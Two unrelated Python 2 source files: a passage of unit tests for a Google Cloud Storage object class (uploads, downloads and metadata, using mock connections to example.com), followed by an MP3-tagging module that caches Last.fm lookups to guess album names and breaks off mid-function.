'content-range': 'bytes 0-2/6'}
chunk2_response = {'status': httplib.OK,
'content-range': 'bytes 3-5/6'}
connection = _Connection(
(chunk1_response, 'abc'),
(chunk2_response, 'def'),
)
bucket = _Bucket(connection)
MEDIA_LINK = 'http://example.com/media/'
properties = {'mediaLink': MEDIA_LINK}
key = self._makeOne(bucket, KEY, properties)
key.CHUNK_SIZE = 3
fh = StringIO()
key.download_to_file(fh)
self.assertEqual(fh.getvalue(), 'abcdef')
def test_download_to_filename(self):
import httplib
import os
import time
import datetime
from tempfile import NamedTemporaryFile
KEY = 'key'
chunk1_response = {'status': httplib.PARTIAL_CONTENT,
'content-range': 'bytes 0-2/6'}
chunk2_response = {'status': httplib.OK,
'content-range': 'bytes 3-5/6'}
connection = _Connection(
(chunk1_response, 'abc'),
(chunk2_response, 'def'),
)
bucket = _Bucket(connection)
MEDIA_LINK = 'http://example.com/media/'
properties = {'mediaLink': MEDIA_LINK,
'updated': '2014-12-06T13:13:50.690Z'}
key = self._makeOne(bucket, KEY, properties)
key.CHUNK_SIZE = 3
with NamedTemporaryFile() as f:
key.download_to_filename(f.name)
f.flush()
with open(f.name) as g:
wrote = g.read()
mtime = os.path.getmtime(f.name)
updatedTime = time.mktime(
datetime.datetime.strptime(
key.properties['updated'],
'%Y-%m-%dT%H:%M:%S.%fz').timetuple()
)
self.assertEqual(wrote, 'abcdef')
self.assertEqual(mtime, updatedTime)
def test_download_as_string(self):
import httplib
KEY = 'key'
chunk1_response = {'status': httplib.PARTIAL_CONTENT,
'content-range': 'bytes 0-2/6'}
chunk2_response = {'status': httplib.OK,
'content-range': 'bytes 3-5/6'}
connection = _Connection(
(chunk1_response, 'abc'),
(chunk2_response, 'def'),
)
bucket = _Bucket(connection)
MEDIA_LINK = 'http://example.com/media/'
properties = {'mediaLink': MEDIA_LINK}
key = self._makeOne(bucket, KEY, properties)
key.CHUNK_SIZE = 3
fetched = key.download_as_string()
self.assertEqual(fetched, 'abcdef')
def test_upload_from_file_simple(self):
import httplib
from tempfile import NamedTemporaryFile
from urlparse import parse_qsl
from urlparse import urlsplit
KEY = 'key'
DATA = 'ABCDEF'
response = {'status': httplib.OK}
connection = _Connection(
(response, ''),
)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.CHUNK_SIZE = 5
with NamedTemporaryFile() as fh:
fh.write(DATA)
fh.flush()
key.upload_from_file(fh, rewind=True)
rq = connection.http._requested
self.assertEqual(len(rq), 1)
self.assertEqual(rq[0]['method'], 'POST')
uri = rq[0]['uri']
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual(scheme, 'http')
self.assertEqual(netloc, 'example.com')
self.assertEqual(path, '/b/name/o')
self.assertEqual(dict(parse_qsl(qs)),
{'uploadType': 'media', 'name': 'key'})
headers = dict(
[(x.title(), str(y)) for x, y in rq[0]['headers'].items()])
self.assertEqual(headers['Content-Length'], '6')
self.assertEqual(headers['Content-Type'], 'application/unknown')
def test_upload_from_file_resumable(self):
import httplib
from tempfile import NamedTemporaryFile
from urlparse import parse_qsl
from urlparse import urlsplit
from gcloud._testing import _Monkey
from _gcloud_vendor.apitools.base.py import http_wrapper
from _gcloud_vendor.apitools.base.py import transfer
KEY = 'key'
UPLOAD_URL = 'http://example.com/upload/name/key'
DATA = 'ABCDEF'
loc_response = {'status': httplib.OK, 'location': UPLOAD_URL}
chunk1_response = {'status': http_wrapper.RESUME_INCOMPLETE,
'range': 'bytes 0-4'}
chunk2_response = {'status': httplib.OK}
connection = _Connection(
(loc_response, ''),
(chunk1_response, ''),
(chunk2_response, ''),
)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.CHUNK_SIZE = 5
# Set the threshhold low enough that we force a resumable uploada.
with _Monkey(transfer, _RESUMABLE_UPLOAD_THRESHOLD=5):
with NamedTemporaryFile() as fh:
fh.write(DATA)
fh.flush()
key.upload_from_file(fh, rewind=True)
rq = connection.http._requested
self.assertEqual(len(rq), 3)
self.assertEqual(rq[0]['method'], 'POST')
uri = rq[0]['uri']
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual(scheme, 'http')
self.assertEqual(netloc, 'example.com')
self.assertEqual(path, '/b/name/o')
self.assertEqual(dict(parse_qsl(qs)),
{'uploadType': 'resumable', 'name': 'key'})
headers = dict(
[(x.title(), str(y)) for x, y in rq[0]['headers'].items()])
self.assertEqual(headers['X-Upload-Content-Length'], '6')
self.assertEqual(headers['X-Upload-Content-Type'],
'application/unknown')
self.assertEqual(rq[1]['method'], 'PUT')
self.assertEqual(rq[1]['uri'], UPLOAD_URL)
headers = dict(
[(x.title(), str(y)) for x, y in rq[1]['headers'].items()])
self.assertEqual(rq[1]['body'], DATA[:5])
headers = dict(
[(x.title(), str(y)) for x, y in rq[1]['headers'].items()])
self.assertEqual(headers['Content-Range'], 'bytes 0-4/6')
self.assertEqual(rq[2]['method'], 'PUT')
self.assertEqual(rq[2]['uri'], UPLOAD_URL)
self.assertEqual(rq[2]['body'], DATA[5:])
headers = dict(
[(x.title(), str(y)) for x, y in rq[2]['headers'].items()])
self.assertEqual(headers['Content-Range'], 'bytes 5-5/6')
def test_upload_from_file_w_slash_in_name(self):
import httplib
from tempfile import NamedTemporaryFile
from urlparse import parse_qsl
from urlparse import urlsplit
from _gcloud_vendor.apitools.base.py import http_wrapper
KEY = 'parent/child'
UPLOAD_URL = 'http://example.com/upload/name/parent%2Fchild'
DATA = 'ABCDEF'
loc_response = {'status': httplib.OK, 'location': UPLOAD_URL}
chunk1_response = {'status': http_wrapper.RESUME_INCOMPLETE,
'range': 'bytes 0-4'}
chunk2_response = {'status': httplib.OK}
connection = _Connection(
(loc_response, ''),
(chunk1_response, ''),
(chunk2_response, ''),
)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.CHUNK_SIZE = 5
with NamedTemporaryFile() as fh:
fh.write(DATA)
fh.flush()
key.upload_from_file(fh, rewind=True)
rq = connection.http._requested
self.assertEqual(len(rq), 1)
self.assertEqual(rq[0]['method'], 'POST')
uri = rq[0]['uri']
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual(scheme, 'http')
self.assertEqual(netloc, 'example.com')
self.assertEqual(path, '/b/name/o')
self.assertEqual(dict(parse_qsl(qs)),
{'uploadType': 'media', 'name': 'parent/child'})
headers = dict(
[(x.title(), str(y)) for x, y in rq[0]['headers'].items()])
self.assertEqual(headers['Content-Length'], '6')
self.assertEqual(headers['Content-Type'], 'application/unknown')
def test_upload_from_filename(self):
import httplib
from tempfile import NamedTemporaryFile
from urlparse import parse_qsl
from urlparse import urlsplit
from _gcloud_vendor.apitools.base.py import http_wrapper
KEY = 'key'
UPLOAD_URL = 'http://example.com/upload/name/key'
DATA = 'ABCDEF'
loc_response = {'status': httplib.OK, 'location': UPLOAD_URL}
chunk1_response = {'status': http_wrapper.RESUME_INCOMPLETE,
'range': 'bytes 0-4'}
chunk2_response = {'status': httplib.OK}
connection = _Connection(
(loc_response, ''),
(chunk1_response, ''),
(chunk2_response, ''),
)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.CHUNK_SIZE = 5
with NamedTemporaryFile(suffix='.jpeg') as fh:
fh.write(DATA)
fh.flush()
key.upload_from_filename(fh.name)
rq = connection.http._requested
self.assertEqual(len(rq), 1)
self.assertEqual(rq[0]['method'], 'POST')
uri = rq[0]['uri']
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual(scheme, 'http')
self.assertEqual(netloc, 'example.com')
self.assertEqual(path, '/b/name/o')
self.assertEqual(dict(parse_qsl(qs)),
{'uploadType': 'media', 'name': 'key'})
headers = dict(
[(x.title(), str(y)) for x, y in rq[0]['headers'].items()])
self.assertEqual(headers['Content-Length'], '6')
self.assertEqual(headers['Content-Type'], 'image/jpeg')
def test_upload_from_string(self):
import httplib
from urlparse import parse_qsl
from urlparse import urlsplit
from _gcloud_vendor.apitools.base.py import http_wrapper
KEY = 'key'
UPLOAD_URL = 'http://example.com/upload/name/key'
DATA = 'ABCDEF'
loc_response = {'status': httplib.OK, 'location': UPLOAD_URL}
chunk1_response = {'status': http_wrapper.RESUME_INCOMPLETE,
'range': 'bytes 0-4'}
chunk2_response = {'status': httplib.OK}
connection = _Connection(
(loc_response, ''),
(chunk1_response, ''),
(chunk2_response, ''),
)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.CHUNK_SIZE = 5
key.upload_from_string(DATA)
rq = connection.http._requested
self.assertEqual(len(rq), 1)
self.assertEqual(rq[0]['method'], 'POST')
uri = rq[0]['uri']
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual(scheme, 'http')
self.assertEqual(netloc, 'example.com')
self.assertEqual(path, '/b/name/o')
self.assertEqual(dict(parse_qsl(qs)),
{'uploadType': 'media', 'name': 'key'})
headers = dict(
[(x.title(), str(y)) for x, y in rq[0]['headers'].items()])
self.assertEqual(headers['Content-Length'], '6')
self.assertEqual(headers['Content-Type'], 'text/plain')
def test_make_public(self):
from gcloud.storage.acl import _ACLEntity
KEY = 'key'
permissive = [{'entity': 'allUsers', 'role': _ACLEntity.READER_ROLE}]
after = {'acl': permissive}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.acl.loaded = True
key.make_public()
self.assertEqual(list(key.acl), permissive)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'], {'acl': permissive})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_cache_control_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
CACHE_CONTROL = 'no-cache'
properties = {'cacheControl': CACHE_CONTROL}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.cache_control, CACHE_CONTROL)
def test_cache_control_setter(self):
KEY = 'key'
CACHE_CONTROL = 'no-cache'
after = {'cacheControl': CACHE_CONTROL}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.cache_control = CACHE_CONTROL
self.assertEqual(key.cache_control, CACHE_CONTROL)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'], {'cacheControl': CACHE_CONTROL})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_component_count(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
COMPONENT_COUNT = 42
properties = {'componentCount': COMPONENT_COUNT}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.component_count, COMPONENT_COUNT)
def test_content_disposition_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
CONTENT_DISPOSITION = 'Attachment; filename=example.jpg'
properties = {'contentDisposition': CONTENT_DISPOSITION}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.content_disposition, CONTENT_DISPOSITION)
def test_content_disposition_setter(self):
KEY = 'key'
CONTENT_DISPOSITION = 'Attachment; filename=example.jpg'
after = {'contentDisposition': CONTENT_DISPOSITION}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.content_disposition = CONTENT_DISPOSITION
self.assertEqual(key.content_disposition, CONTENT_DISPOSITION)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'contentDisposition': CONTENT_DISPOSITION})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_content_encoding_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
CONTENT_ENCODING = 'gzip'
properties = {'contentEncoding': CONTENT_ENCODING}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.content_encoding, CONTENT_ENCODING)
def test_content_encoding_setter(self):
KEY = 'key'
CONTENT_ENCODING = 'gzip'
after = {'contentEncoding': CONTENT_ENCODING}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.content_encoding = CONTENT_ENCODING
self.assertEqual(key.content_encoding, CONTENT_ENCODING)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'contentEncoding': CONTENT_ENCODING})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_content_language_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
CONTENT_LANGUAGE = 'pt-BR'
properties = {'contentLanguage': CONTENT_LANGUAGE}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.content_language, CONTENT_LANGUAGE)
def test_content_language_setter(self):
KEY = 'key'
CONTENT_LANGUAGE = 'pt-BR'
after = {'contentLanguage': CONTENT_LANGUAGE}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.content_language = CONTENT_LANGUAGE
self.assertEqual(key.content_language, CONTENT_LANGUAGE)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'contentLanguage': CONTENT_LANGUAGE})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_content_type_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
CONTENT_TYPE = 'image/jpeg'
properties = {'contentType': CONTENT_TYPE}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.content_type, CONTENT_TYPE)
def test_content_type_setter(self):
KEY = 'key'
CONTENT_TYPE = 'image/jpeg'
after = {'contentType': CONTENT_TYPE}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.content_type = CONTENT_TYPE
self.assertEqual(key.content_type, CONTENT_TYPE)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'contentType': CONTENT_TYPE})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_crc32c_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
CRC32C = 'DEADBEEF'
properties = {'crc32c': CRC32C}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.crc32c, CRC32C)
def test_crc32c_setter(self):
KEY = 'key'
CRC32C = 'DEADBEEF'
after = {'crc32c': CRC32C}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.crc32c = CRC32C
self.assertEqual(key.crc32c, CRC32C)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'crc32c': CRC32C})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_etag(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
ETAG = 'ETAG'
properties = {'etag': ETAG}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.etag, ETAG)
def test_generation(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
GENERATION = 42
properties = {'generation': GENERATION}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.generation, GENERATION)
def test_id(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
ID = 'ID'
properties = {'id': ID}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.id, ID)
def test_md5_hash_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
MD5_HASH = 'DEADBEEF'
properties = {'md5Hash': MD5_HASH}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.md5_hash, MD5_HASH)
def test_md5_hash_setter(self):
KEY = 'key'
MD5_HASH = 'DEADBEEF'
after = {'md5Hash': MD5_HASH}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.md5_hash = MD5_HASH
self.assertEqual(key.md5_hash, MD5_HASH)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'md5Hash': MD5_HASH})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_media_link(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
MEDIA_LINK = 'http://example.com/media/'
properties = {'mediaLink': MEDIA_LINK}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.media_link, MEDIA_LINK)
def test_metadata_getter(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
METADATA = {'foo': 'Foo'}
properties = {'metadata': METADATA}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.metadata, METADATA)
def test_metadata_setter(self):
KEY = 'key'
METADATA = {'foo': 'Foo'}
after = {'metadata': METADATA}
connection = _Connection(after)
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
key.metadata = METADATA
self.assertEqual(key.metadata, METADATA)
kw = connection._requested
self.assertEqual(len(kw), 1)
self.assertEqual(kw[0]['method'], 'PATCH')
self.assertEqual(kw[0]['path'], '/b/name/o/%s' % KEY)
self.assertEqual(kw[0]['data'],
{'metadata': METADATA})
self.assertEqual(kw[0]['query_params'], {'projection': 'full'})
def test_metageneration(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
METAGENERATION = 42
properties = {'metageneration': METAGENERATION}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.metageneration, METAGENERATION)
def test_owner(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
OWNER = {'entity': 'project-owner-12345', 'entityId': '23456'}
properties = {'owner': OWNER}
key = self._makeOne(bucket, KEY, properties)
owner = key.owner
self.assertEqual(owner['entity'], 'project-owner-12345')
self.assertEqual(owner['entityId'], '23456')
def test_self_link(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
SELF_LINK = 'http://example.com/self/'
properties = {'selfLink': SELF_LINK}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.self_link, SELF_LINK)
def test_size(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
SIZE = 42
properties = {'size': SIZE}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.size, SIZE)
def test_storage_class(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
STORAGE_CLASS = 'http://example.com/self/'
properties = {'storageClass': STORAGE_CLASS}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.storage_class, STORAGE_CLASS)
def test_time_deleted(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
TIME_DELETED = '2014-11-05T20:34:37Z'
properties = {'timeDeleted': TIME_DELETED}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.time_deleted, TIME_DELETED)
def test_updated(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
UPDATED = '2014-11-05T20:34:37Z'
properties = {'updated': UPDATED}
key = self._makeOne(bucket, KEY, properties)
self.assertEqual(key.updated, UPDATED)
class _Responder(object):
def __init__(self, *responses):
self._responses = responses[:]
self._requested = []
def _respond(self, **kw):
self._requested.append(kw)
response, self._responses = self._responses[0], self._responses[1:]
return response
class _Connection(_Responder):
API_BASE_URL = 'http://example.com'
USER_AGENT = 'testing 1.2.3'
def __init__(self, *responses):
super(_Connection, self).__init__(*responses)
self._signed = []
self.http = _HTTP(*responses)
def api_request(self, **kw):
return self._respond(**kw)
def build_api_url(self, path, query_params=None,
api_base_url=API_BASE_URL, upload=False):
from urllib import urlencode
from urlparse import urlsplit
from urlparse import urlunsplit
# mimic the build_api_url interface, but avoid unused param and
# missed coverage errors
upload = not upload # pragma NO COVER
qs = urlencode(query_params or {})
scheme, netloc, _, _, _ = urlsplit(api_base_url)
return urlunsplit((scheme, netloc, path, qs, ''))
def generate_signed_url(self, resource, expiration, **kw):
self._signed.append((resource, expiration, kw))
return ('http://example.com/abucket/akey?Signature=DEADBEEF'
'&Expiration=%s' % expiration)
class _HTTP(_Responder):
def request(self, uri, method, headers, body, **kw):
return self._respond(uri=uri, method=method, headers=headers,
body=body, **kw)
class _Bucket(object):
path = '/b/name'
name = 'name'
def __init__(self, connection):
self.connection = connection
self._keys = {}
self._deleted = []
def get_key(self, key):
return self._keys.get(key)
def copy_key(self, key, destination_bucket, new_name):
destination_bucket._keys[new_name] = self._keys[key.name]
return key.from_dict({'name': new_name}, bucket=destination_bucket)
def delete_key(self, key):
del self._keys[key.name]
self._deleted.append(key.name)
|
|
'''
this is a module (used as a singleton) that keeps track of the artists, albums,
and tracks we've found so far in the mp3 collection. Keeping track of these is
key to the algorithm of choosing correct album names (see refineGuessCache).
internally there are 3 global dicts.
ARTIST_META_CACHE: just to cache the lastfm calls for ALL artist/album/track info
TRACK_GUESS_CACHE:
ALBUM_GUESS_CACHE: these two dicts keep track of the same info (the artists, albums,
tracks, and associated mp3 path names). I use 2 dicts because it
makes the refineGuessCache algorithm much easier.
'''
import sys, pickle, os
from mp3scrub.util import strtool, mylog
from mp3scrub import globalz
from mp3scrub.util.musicTypes import Artist, Album, Track
from mp3scrub.netquery import lastfmquery, googquery
# track_cache['artist_name']['mp3Path'] = (Track obj)
TRACK_GUESS_CACHE = {}
# album_cache['artist_name']['albumName'] = Album obj
ALBUM_GUESS_CACHE = {}
# artist_cache['artist_name'] = Artist obj
ARTIST_META_CACHE = {}
# google artist lookup cache
GOOG_META_CACHE = {}
def clearCache():
''' reset all the cache '''
TRACK_GUESS_CACHE.clear()
ALBUM_GUESS_CACHE.clear()
def _updateArtistCache(fixed_artist_str):
'''
input: clean artist name.
output: ArtistObj
details: will update the local cache so we only query lastfm once per artist.
'''
# load up the artist info from last.fm
if not fixed_artist_str in ARTIST_META_CACHE:
mylog.INFO('looking up %s metadata...' % fixed_artist_str)
ARTIST_META_CACHE[fixed_artist_str] = lastfmquery.getAllArtistInfo(fixed_artist_str)
return ARTIST_META_CACHE[fixed_artist_str]
def _updateTrackGuesses(artist_name, path_name, track_obj):
if not TRACK_GUESS_CACHE.get(artist_name):
TRACK_GUESS_CACHE[artist_name] = {}
if not TRACK_GUESS_CACHE[artist_name].get(path_name):
# only using track_obj as a trackname/trackno bean
TRACK_GUESS_CACHE[artist_name][path_name] = track_obj.copy()
del TRACK_GUESS_CACHE[artist_name][path_name].albums[:]
TRACK_GUESS_CACHE[artist_name][path_name].addAlbum(track_obj.album)
def _updateAlbumGuesses(artist_name, track_obj, album_obj):
if not ALBUM_GUESS_CACHE.get(artist_name):
ALBUM_GUESS_CACHE[artist_name] = {}
if not ALBUM_GUESS_CACHE[artist_name].get(album_obj.name):
ALBUM_GUESS_CACHE[artist_name][album_obj.name] = album_obj.copy()
del ALBUM_GUESS_CACHE[artist_name][album_obj.name].tracks[:]
mylog.DBG1(4,'ALGDBG: adding track \'%s\' to album \'%s\'...' %
(track_obj.name, album_obj.name))
ALBUM_GUESS_CACHE[artist_name][album_obj.name].addTrack(track_obj.copy())
def getRawArtistInfo(artist_str):
_updateArtistCache(artist_str)
return ARTIST_META_CACHE[artist_str]
def updateGuessCache(path_str, id3_track_str, fixed_artist_str):
''' called once per new mp3 processed. adds all possible track/album matches to a list
that will be further narrowed down later to one match.
'''
found_track = False
# lookup the full artist/album info if haven't already
artist_obj = _updateArtistCache(fixed_artist_str)
# we loop through all the tracks, looking for the one with the least difference
# from id3_track_str. see strtool for more info
for i,album_obj in enumerate(artist_obj.albums):
if i > globalz.ALBUM_GUESS_LIMIT: break
if not album_obj.name:
mylog.DBG('null album length for artist \'%s\' track \'%s\'' %
(fixed_artist_str, id3_track_str))
continue
guess_album_obj = album_obj.copy()
# remove junky parens. see strtool for details
clean_id3_track_str = strtool.removeTrackJunk(id3_track_str)
best_track_matches = []
# loop through all the track in this album, searching for the specified track
for track_obj in album_obj.tracks:
targ_track_str = strtool.removeTrackJunk(track_obj.name)
mylog.DBG1(10,'comparing mytrack_obj: \'%s\' guesstrack: \'%s\' guessalbum: \'%s\'' %
(clean_id3_track_str, targ_track_str, album_obj.name))
dist = strtool.trackCompare(clean_id3_track_str, targ_track_str)
if dist != -1:
mylog.DBG1(10,'track match: \'%s\' guesstrack: \'%s\' guessalbum: \'%s\'' %
(clean_id3_track_str, targ_track_str, album_obj.name))
guess_track_obj = Track(_album=album_obj.name, _name=targ_track_str,
_track_num=track_obj.track_num, _path=path_str)
best_track_matches.append((dist, guess_track_obj))
# if we found a match...
if best_track_matches:
# return the track with the least dist from id3's trackName
best_track_matches.sort()
best_track_obj = best_track_matches[0][1]
_updateTrackGuesses(artist_obj.name, path_str, best_track_obj)
_updateAlbumGuesses(artist_obj.name, best_track_obj, guess_album_obj)
del best_track_matches
found_track = True
return found_track
def refineGuessCache():
''' narrow down album guesses after everythings been processed.
REFINE STEPS
1. sort your albums from best to worst, ranked by:
(%complete * %complete * albumRank * total_tracks)
2. look at all your tracks from your current top album.
a) remove all these tracks from lesser albums (cause they're a
worse match)
b) add the current top album to a 'processed' list, so we don't
process it again
c) since removing tracks from lesser albums will change their
%complete rank, resort by going back to step 1
3. repeat until all albums processed
'''
def removeTrackElsewhere(track_obj, keep_album_str, alb_ptr, trkPtr):
''' helper function that keeps a track in one album but removes it everywhere else '''
mylog.DBG1(10,'keeping %s in %s\n' % (track_obj.name, keep_album_str))
modded = False
if globalz.LOG_DEBUG > 8:
for i,alb in enumerate(alb_ptr):
for y, trk in enumerate(alb_ptr[alb].tracks):
mylog.DBG1(8,'albName: \'%s\' albptrTrk1 %d: \'%s\'\n' % (alb, y, unicode(trk.name)))
# delete the current track in every album that's not here
for del_album in alb_ptr:
if del_album == keep_album_str: continue
# delete track from all other albums in album cache
for t in alb_ptr[del_album].tracks:
if track_obj == t:
while t in alb_ptr[del_album].tracks:
alb_ptr[del_album].tracks.remove(t)
modded = True
# delete all other albums from TRACK_GUESS_CACHE
if keep_album_str in trkPtr[track_obj.path].albums:
trkPtr[track_obj.path].album = keep_album_str
else:
del trkPtr[track_obj.path].albums[:]
if globalz.LOG_DEBUG > 8:
for i,alb in enumerate(alb_ptr):
for y, trk in enumerate(alb_ptr[alb].tracks):
mylog.DBG1(8,'albName2: \'%s\' albptrTrk %d: \'%s\'\n' % (alb, y, unicode(trk.name)))
return modded
def reSortAlbums(my_albums, alb_ptr, skip_albums):
''' sort album list by appropriateness'''
if my_albums: del my_albums[:]
for album in alb_ptr:
ptr = alb_ptr[album]
tracks_found = len(ptr.tracks)
if album in skip_albums: continue
if tracks_found == 0: continue
# easiest to calculate % here
ptr.pct_complete = float(tracks_found) / ptr.total_tracks
ptr.pct_score = (ptr.pct_complete * ptr.pct_complete * ptr.rank * tracks_found)
mylog.DBG1(4,'ALGDBG: artist: %s album: %s complete: %f rank: %d found: %d' %
(ptr.artist, ptr.name, ptr.pct_complete, ptr.rank, tracks_found))
my_albums.append((ptr.pct_score, album))
my_albums.sort(reverse=True)
# iterate through the potential album list
for artist in sorted(ALBUM_GUESS_CACHE):
albums_ptr = ALBUM_GUESS_CACHE[artist]
tracks_ptr = TRACK_GUESS_CACHE[artist]
sort_all_albums = []
reSortAlbums(sort_all_albums, albums_ptr, [])
processed_albums = []
while sort_all_albums:
resort = False
for _, better_album in sort_all_albums:
if resort: break
ptr = albums_ptr[better_album]
for trk in ptr.tracks[:]:
# delete the current trk in every album that's not here
removeTrackElsewhere(trk, better_album, albums_ptr, tracks_ptr)
processed_albums.append(better_album)
reSortAlbums(sort_all_albums, albums_ptr, processed_albums)
resort = True
def searchGuessCache(artist_str, path_str):
''' given an artistname and path, see if we found a guess '''
ret = None
mylog.DBG1(10,'searching for artist %s and path %s\n' % (artist_str, path_str))
# see if we found a guess Track for the mp3
artist_obj = TRACK_GUESS_CACHE.get(artist_str)
if artist_obj:
ret = artist_obj.get(path_str)
if not ret or not ret.album:
mylog.ERR('no album found for MP3 %s\n' % (path_str))
ret = None
return ret
def dbgPrint(fileDes):
def uniP(*x):
for i in x:
print >> fileDes, unicode(x).encode('utf-8')
for artist in ARTIST_META_CACHE:
uniP('ARTIST: ', artist)
alb_ptr = ARTIST_META_CACHE[artist].albums
for a in alb_ptr:
uniP('ALBUM: {0:30} ==> {1}\n'.format('', unicode(a)))
for t in a.tracks:
uniP('{0:>35} {1:>30}\n'.format('TRACK:', unicode(t)))
uniP('\n\n\n')
uniP('TRACK INFO:')
for trk in TRACK_GUESS_CACHE:
for t in TRACK_GUESS_CACHE[trk]:
uniP('{0:30} ==> {1}'.format(t, unicode(TRACK_GUESS_CACHE[trk][t])))
uniP('\n\n\n')
uniP('ALBUM INFO:')
for alb in ALBUM_GUESS_CACHE:
for a in ALBUM_GUESS_CACHE[alb]:
#print >> fileDes, 'ALBUM: {0:30} ==> {1}\n'.format(a, str(ALBUM_GUESS_CACHE[alb][a]))
for t in ALBUM_GUESS_CACHE[alb][a].tracks:
uniP('{0:>35} {1:>30}\n'.format('TRACK:', unicode(t)))
uniP('\n\n\n')
def undump():
''' if we've already queried artist info in the past, load it up, son! '''
global ARTIST_META_CACHE
global GOOG_META_CACHE
if os.path.exists(globalz.PICKLE_FILE):
with open(globalz.PICKLE_FILE,'rb') as fl:
try:
ARTIST_META_CACHE = pickle.load(fl)
GOOG_META_CACHE = pickle.load(fl)
except:
